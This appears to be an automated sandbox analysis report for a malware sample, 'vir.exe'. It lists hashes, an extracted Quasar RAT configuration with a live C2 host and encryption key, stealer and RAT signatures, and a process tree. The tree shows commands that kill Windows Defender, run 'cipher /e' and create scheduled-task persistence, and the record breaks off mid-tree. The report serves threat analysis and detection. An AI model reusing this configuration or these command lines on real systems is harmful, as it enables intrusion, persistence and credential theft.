Resubmissions

27-09-2024 10:28

240927-mh3m1sxgrm 10

18-08-2024 19:49

240818-yjmtqsthkm 10

18-08-2024 14:30

240818-rvdxmsxgjg 10

15-08-2024 23:29

240815-3g3jmawdnq 10

15-08-2024 23:15

240815-28syts1brg 10

15-08-2024 22:57

240815-2w8thszepa 10

15-08-2024 22:44

240815-2n53natgpj 10

Analysis

  • max time kernel
    300s
  • max time network
    304s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27-09-2024 10:28

General

  • Target

    vir.exe

  • Size

    336.1MB

  • MD5

    bc82ea785da1180a8a964b3e54ad106c

  • SHA1

    4c1952ce778455af8ed10dca7b9f77d7815e8d0a

  • SHA256

    c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b

  • SHA512

    62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b

  • SSDEEP

    6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

C2

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes
  • encryption_key

    E1BF1D99459F04CAF668F054744BC2C514B0A3D6

  • install_name

    Romilyaa.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 10 Boot

  • subdirectory

    SubDir

Signatures

  • Detect Umbral payload 2 IoCs
  • MassLogger

    Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.

  • MassLogger Main payload 2 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 11 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Windows security bypass 2 TTPs 5 IoCs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 3 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Manipulates Digital Signatures 1 TTPs 3 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 5 IoCs
  • .NET Reactor proctector 34 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 48 IoCs
  • Loads dropped DLL 56 IoCs
  • Modifies file permissions 1 TTPs 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 2 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Windows security modification 2 TTPs 6 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

  • AutoIT Executable 4 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 9 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 28 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 17 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 4 IoCs
  • Enumerates system info in registry 2 TTPs 13 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies registry class 36 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 17 IoCs
  • Runs regedit.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 53 IoCs
  • Suspicious use of SetWindowsHookEx 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\vir.exe
    "C:\Users\Admin\AppData\Local\Temp\vir.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\!main.cmd" "
      2⤵
      • Loads dropped DLL
      • Checks whether UAC is enabled
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1048
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K spread.cmd
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1432
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 1 C:\Users\Admin\Desktop
          4⤵
          • Enumerates system info in registry
          PID:2364
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 2 C:\Users\Admin\Desktop
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:1120
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 3 C:\Users\Admin\
          4⤵
          • Enumerates system info in registry
          PID:2188
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K doxx.cmd
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2268
        • C:\Windows\SysWOW64\ipconfig.exe
          ipconfig
          4⤵
          • Gathers network information
          PID:2324
        • C:\Windows\SysWOW64\net.exe
          net accounts
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1944
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 accounts
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2196
        • C:\Windows\SysWOW64\net.exe
          net user
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:328
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1924
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /apps /v /fo table
          4⤵
          • Enumerates processes with tasklist
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1620
      • C:\Windows\SysWOW64\PING.EXE
        ping google.com -t -n 1 -s 4 -4
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2016
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im WindowsDefender.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1852
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K handler.cmd
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1544
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K cipher.cmd
        3⤵
        • System Location Discovery: System Language Discovery
        PID:856
        • C:\Windows\SysWOW64\cipher.exe
          cipher /e
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2228
        • C:\Windows\SysWOW64\cipher.exe
          cipher /e
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3796
        • C:\Windows\SysWOW64\cipher.exe
          cipher /e
          4⤵
            PID:2624
          • C:\Windows\SysWOW64\cipher.exe
            cipher /e
            4⤵
              PID:2992
          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\Rover.exe
            Rover.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2436
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\web.htm
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            PID:1104
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1104 CREDAT:275457 /prefetch:2
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:280
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1104 CREDAT:406532 /prefetch:2
              4⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2524
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1104 CREDAT:406556 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:3328
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1104 CREDAT:3290130 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:3748
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1104 CREDAT:3027990 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:3356
          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\Google.exe
            Google.exe
            3⤵
            • Executes dropped EXE
            PID:444
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\helper.vbs"
            3⤵
              PID:1260
            • C:\Windows\SysWOW64\PING.EXE
              ping google.com -t -n 1 -s 4 -4
              3⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:1928
            • C:\Windows\SysWOW64\PING.EXE
              ping mrbeast.codes -t -n 1 -s 4 -4
              3⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:3788
            • C:\Windows\SysWOW64\xcopy.exe
              xcopy Google.exe C:\Users\Admin\Desktop
              3⤵
              • Enumerates system info in registry
              PID:2552
            • C:\Windows\SysWOW64\xcopy.exe
              xcopy Rover.exe C:\Users\Admin\Desktop
              3⤵
              • Enumerates system info in registry
              PID:2936
            • C:\Windows\SysWOW64\xcopy.exe
              xcopy spinner.gif C:\Users\Admin\Desktop
              3⤵
              • System Location Discovery: System Language Discovery
              • Enumerates system info in registry
              PID:2308
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /K bloatware.cmd
              3⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1964
              • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\bloatware\1.exe
                1.exe
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2780
              • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\bloatware\3.exe
                3.exe
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of SetWindowsHookEx
                PID:3132
                • C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
                  C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
                  5⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:1980
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=GB&client_asn=212238&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiR0IiLCJjbGllbnRfdmVyc2lvbiI6IjE3OSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyNC0wOS0yN1QxMDozMDo0NS4xMDBaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ
                  5⤵
                    PID:3128
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\bloatware\2.hta"
                  4⤵
                  • Blocklisted process makes network request
                  • System Location Discovery: System Language Discovery
                  PID:3312
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /K SilentSetup.cmd
                  4⤵
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2672
                  • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
                    WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:2332
                    • C:\Users\Admin\AppData\Local\Temp\is-JU4EC.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-JU4EC.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$10358,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      PID:1524
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:2868
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im winaerotweaker.exe /f
                          8⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3344
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
                        7⤵
                          PID:3080
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im winaerotweakerhelper.exe /f
                            8⤵
                            • System Location Discovery: System Language Discovery
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3212
                • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\regmess.exe
                  regmess.exe
                  3⤵
                  • Executes dropped EXE
                  PID:1188
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\regmess_91f52043-5494-440c-a1a0-e69f7286ad90\regmess.bat" "
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1708
                    • C:\Windows\SysWOW64\reg.exe
                      reg import Setup.reg /reg:32
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:792
                    • C:\Windows\SysWOW64\reg.exe
                      reg import Console.reg /reg:32
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:2640
                    • C:\Windows\SysWOW64\reg.exe
                      reg import Desktop.reg /reg:32
                      5⤵
                      • Sets desktop wallpaper using registry
                      PID:2360
                    • C:\Windows\SysWOW64\reg.exe
                      reg import International.reg /reg:32
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:3096
                    • C:\Windows\SysWOW64\reg.exe
                      reg import Fonts.reg /reg:32
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Modifies Internet Explorer settings
                      PID:3128
                    • C:\Windows\SysWOW64\reg.exe
                      reg import Cursors.reg /reg:32
                      5⤵
                        PID:3168
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 10
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Delays execution with timeout.exe
                    PID:2076
                  • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\scary.exe
                    scary.exe
                    3⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3420
                    • C:\Windows\system32\schtasks.exe
                      "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                      4⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:2744
                    • C:\Program Files\SubDir\Romilyaa.exe
                      "C:\Program Files\SubDir\Romilyaa.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of SetWindowsHookEx
                      PID:2796
                      • C:\Windows\system32\schtasks.exe
                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                        5⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:2388
                      • C:\Windows\system32\cmd.exe
                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\HTMrQNSHs6H8.bat" "
                        5⤵
                          PID:3884
                          • C:\Windows\system32\chcp.com
                            chcp 65001
                            6⤵
                              PID:3956
                            • C:\Windows\system32\PING.EXE
                              ping -n 10 localhost
                              6⤵
                              • System Network Configuration Discovery: Internet Connection Discovery
                              • Runs ping.exe
                              PID:3324
                            • C:\Program Files\SubDir\Romilyaa.exe
                              "C:\Program Files\SubDir\Romilyaa.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:904
                              • C:\Windows\system32\schtasks.exe
                                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                7⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:2736
                              • C:\Windows\system32\cmd.exe
                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\EPJXV115NJdj.bat" "
                                7⤵
                                  PID:1368
                                  • C:\Windows\system32\chcp.com
                                    chcp 65001
                                    8⤵
                                      PID:3244
                                    • C:\Windows\system32\PING.EXE
                                      ping -n 10 localhost
                                      8⤵
                                      • System Network Configuration Discovery: Internet Connection Discovery
                                      • Runs ping.exe
                                      PID:3296
                                    • C:\Program Files\SubDir\Romilyaa.exe
                                      "C:\Program Files\SubDir\Romilyaa.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:2448
                                      • C:\Windows\system32\schtasks.exe
                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                        9⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3684
                                      • C:\Windows\system32\cmd.exe
                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\yc59zIkegofu.bat" "
                                        9⤵
                                          PID:2512
                                          • C:\Windows\system32\chcp.com
                                            chcp 65001
                                            10⤵
                                              PID:2228
                                            • C:\Windows\system32\PING.EXE
                                              ping -n 10 localhost
                                              10⤵
                                              • System Network Configuration Discovery: Internet Connection Discovery
                                              • Runs ping.exe
                                              PID:3808
                                            • C:\Program Files\SubDir\Romilyaa.exe
                                              "C:\Program Files\SubDir\Romilyaa.exe"
                                              10⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:3256
                                              • C:\Windows\system32\schtasks.exe
                                                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                11⤵
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2692
                                              • C:\Windows\system32\cmd.exe
                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\WBmF0OekAjxC.bat" "
                                                11⤵
                                                  PID:3756
                                                  • C:\Windows\system32\chcp.com
                                                    chcp 65001
                                                    12⤵
                                                      PID:3688
                                                    • C:\Windows\system32\PING.EXE
                                                      ping -n 10 localhost
                                                      12⤵
                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                      • Runs ping.exe
                                                      PID:2332
                                                    • C:\Program Files\SubDir\Romilyaa.exe
                                                      "C:\Program Files\SubDir\Romilyaa.exe"
                                                      12⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:2668
                                                      • C:\Windows\system32\schtasks.exe
                                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                        13⤵
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:3632
                                                      • C:\Windows\system32\cmd.exe
                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nXH7peU8R1XT.bat" "
                                                        13⤵
                                                          PID:3828
                                                          • C:\Windows\system32\chcp.com
                                                            chcp 65001
                                                            14⤵
                                                              PID:1264
                                                            • C:\Windows\system32\PING.EXE
                                                              ping -n 10 localhost
                                                              14⤵
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              • Runs ping.exe
                                                              PID:920
                                                            • C:\Program Files\SubDir\Romilyaa.exe
                                                              "C:\Program Files\SubDir\Romilyaa.exe"
                                                              14⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SendNotifyMessage
                                                              PID:2552
                                                              • C:\Windows\system32\schtasks.exe
                                                                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                15⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:1688
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\iksE1Cftvgyj.bat" "
                                                                15⤵
                                                                  PID:3776
                                                                  • C:\Windows\system32\chcp.com
                                                                    chcp 65001
                                                                    16⤵
                                                                      PID:2568
                                                                    • C:\Windows\system32\PING.EXE
                                                                      ping -n 10 localhost
                                                                      16⤵
                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                      • Runs ping.exe
                                                                      PID:3336
                                                                    • C:\Program Files\SubDir\Romilyaa.exe
                                                                      "C:\Program Files\SubDir\Romilyaa.exe"
                                                                      16⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:2800
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                        17⤵
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:3684
                                                                      • C:\Windows\system32\cmd.exe
                                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\G1509kuP5KKh.bat" "
                                                                        17⤵
                                                                          PID:2588
                                                                          • C:\Windows\system32\chcp.com
                                                                            chcp 65001
                                                                            18⤵
                                                                              PID:1704
                                                                            • C:\Windows\system32\PING.EXE
                                                                              ping -n 10 localhost
                                                                              18⤵
                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                              • Runs ping.exe
                                                                              PID:860
                                                                            • C:\Program Files\SubDir\Romilyaa.exe
                                                                              "C:\Program Files\SubDir\Romilyaa.exe"
                                                                              18⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SendNotifyMessage
                                                                              PID:3368
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                19⤵
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:2720
                                                                              • C:\Windows\system32\cmd.exe
                                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZqHlI4YblzOb.bat" "
                                                                                19⤵
                                                                                  PID:3956
                                                                                  • C:\Windows\system32\chcp.com
                                                                                    chcp 65001
                                                                                    20⤵
                                                                                      PID:3112
                                                                                    • C:\Windows\system32\PING.EXE
                                                                                      ping -n 10 localhost
                                                                                      20⤵
                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                      • Runs ping.exe
                                                                                      PID:3924
                                                                                    • C:\Program Files\SubDir\Romilyaa.exe
                                                                                      "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                      20⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:3324
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                        21⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:2368
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ffLlPYeX4auy.bat" "
                                                                                        21⤵
                                                                                          PID:2628
                                                                                          • C:\Windows\system32\chcp.com
                                                                                            chcp 65001
                                                                                            22⤵
                                                                                              PID:1736
                                                                                            • C:\Windows\system32\PING.EXE
                                                                                              ping -n 10 localhost
                                                                                              22⤵
                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                              • Runs ping.exe
                                                                                              PID:932
                                                                                            • C:\Program Files\SubDir\Romilyaa.exe
                                                                                              "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                              22⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              PID:3216
                                                                                              • C:\Windows\system32\schtasks.exe
